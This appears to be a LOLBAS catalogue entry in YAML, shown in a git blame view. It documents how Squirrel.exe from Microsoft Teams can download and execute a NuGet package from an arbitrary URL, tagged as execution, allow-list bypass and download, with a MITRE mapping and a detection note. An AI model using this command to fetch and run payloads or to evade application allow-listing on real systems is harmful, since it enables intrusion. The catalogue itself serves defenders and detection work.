LOLBAS/yml/OtherMSBinaries/squirrel.yml

47 lines
1.9 KiB
YAML
Raw Normal View History

2019-06-27 17:21:41 +02:00
---
2019-06-27 17:12:23 +02:00
Name: Squirrel.exe
Description: Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.
Author: 'Reegun J (OCBC Bank) - @reegun21'
Created: '2019-06-26'
2019-06-27 14:22:35 +02:00
Commands:
- Command: squirrel.exe --download [url to package]
2019-06-27 17:12:23 +02:00
Description: The above binary will go to url and look for RELEASES file and download the nuget package.
2019-06-27 14:22:35 +02:00
Usecase: Download and execute binary
Category: Execute
2019-06-27 17:12:23 +02:00
Privileges: User
2019-06-27 14:22:35 +02:00
MitreID: T1218
MitreLink: https://attack.mitre.org/techniques/T1218/
2019-06-27 17:12:23 +02:00
OperatingSystem: Windows 7 and up with Microsoft Teams installed
2019-06-27 14:22:35 +02:00
- Command: squirrel.exe --download [url to package]
2019-06-27 17:12:23 +02:00
Description: The above binary will go to url and look for RELEASES file and download the nuget package.
2019-06-27 14:22:35 +02:00
Usecase: Download and execute binary
Category: AWL Bypass
2019-06-27 17:12:23 +02:00
Privileges: User
2019-06-27 14:22:35 +02:00
MitreID: T1218
MitreLink: https://attack.mitre.org/techniques/T1218/
OperatingSystem: Windows 10
- Command: squirrel.exe --download [url to package]
2019-06-27 17:12:23 +02:00
Description: The above binary will go to url and look for RELEASES file and download the nuget package.
2019-06-27 14:22:35 +02:00
Usecase: Download and execute binary
Category: Download
2019-06-27 17:12:23 +02:00
Privileges: User
2019-06-27 14:22:35 +02:00
MitreID: T1218
MitreLink: https://attack.mitre.org/techniques/T1218/
2019-06-27 17:12:23 +02:00
OperatingSystem: Windows 7 and up with Microsoft Teams installed
2019-06-27 14:22:35 +02:00
Full_Path:
2019-06-27 17:12:23 +02:00
- Path: '%localappdata%\Microsoft\Teams\current\Squirrel.exe'
2019-06-27 14:22:35 +02:00
Code_Sample:
2019-06-27 17:12:23 +02:00
- Code: https://github.com/jreegun/POC-s/tree/master/nuget-squirrel
2019-06-27 14:22:35 +02:00
Detection:
2019-06-27 17:12:23 +02:00
- IOC: Update.exe spawned an unknown process
2019-06-27 14:22:35 +02:00
Resources:
2019-06-27 17:12:23 +02:00
- Link: https://www.youtube.com/watch?v=rOP3hnkj7ls
- Link: https://twitter.com/reegun21/status/1144182772623269889
- Link: http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/
Acknowledgement:
2019-06-27 14:22:35 +02:00
- Person: Reegun J (OCBC Bank)
2019-06-27 17:12:23 +02:00
Handle: '@reegun21'
- Person: Adam
Handle: '@Hexacorn'
2019-06-27 14:22:35 +02:00
---